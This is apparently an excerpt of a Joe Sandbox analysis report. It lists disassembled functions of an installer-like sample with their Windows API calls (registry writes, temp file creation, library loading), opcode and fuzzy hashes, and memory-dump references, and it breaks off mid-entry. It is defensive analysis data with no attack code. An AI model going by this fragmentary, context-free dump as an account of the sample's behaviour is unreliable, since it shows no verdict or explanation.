Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 98cf4bc7d0d0811cdacfc0dace6839f4a3588605fbbab9c97c3218cfca29b612
Instruction ID: f29ef8b62a0f2929495e6fe6dce7384869c250fdf5b21c61945888d6754e71ad
Opcode Fuzzy Hash: 98cf4bc7d0d0811cdacfc0dace6839f4a3588605fbbab9c97c3218cfca29b612
Instruction Fuzzy Hash: A241BC715003049BEB388F7898A4BC677ECBF07324F044566E9199A1D7DFB8E1C48B60

Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf16D9.tmp,00000023,00000011,00000002), ref: 0040242F
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsf16D9.tmp,00000000,00000011,00000002), ref: 0040246F
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsf16D9.tmp,00000000,00000011,00000002), ref: 00402557

Strings

C:\Users\user\AppData\Local\Temp\nsf16D9.tmp, xrefs: 00402420, 0040242E, 00402445, 00402459, 00402464

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsf16D9.tmp
API String ID: 2655323295-2551704783
Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

Function 00405F0D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405F2B
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036EF), ref: 00405F46

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F12, 00405F16
nsa, xrefs: 00405F1A

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-44229769
Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
GetLastError.KERNEL32 ref: 00405976
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
GetLastError.KERNEL32 ref: 00405995

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9

Function 004053C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004053F3
CallWindowProcW.USER32(?,?,?,?), ref: 00405444

Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD

Strings

, xrefs: 004053D4

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E

Function 004062B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307

Strings

Call, xrefs: 004062BD

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4

Function 00406F27 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45

Function 00407128 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45

Function 00406E3E Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45

Function 00406943 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45

Function 00406D91 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45

Function 00406EAF Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45

Function 00406DFB Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45

Function 004032DE Relevance: 4.6, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004032F2

Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
SetFilePointer.KERNELBASE(0017AFB4,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D

Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E

Function 00401B77 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00573800), ref: 00401BE7
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9

Strings

Call, xrefs: 00401B9E, 00401BA4, 00401BBE

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
Instruction ID: 4b9c6e54fa6809cb214bd66434af352d7e41d31d349781cb692caa9f676c35e6
Opcode Fuzzy Hash: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
Instruction Fuzzy Hash: 6E217B73A00200D7DB20EB94CEC995E73A4AB45314765053BF506F32D1DBB8E851DBAD

Function 004024F8 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsf16D9.tmp,00000000,00000011,00000002), ref: 00402557

Memory Dump Source

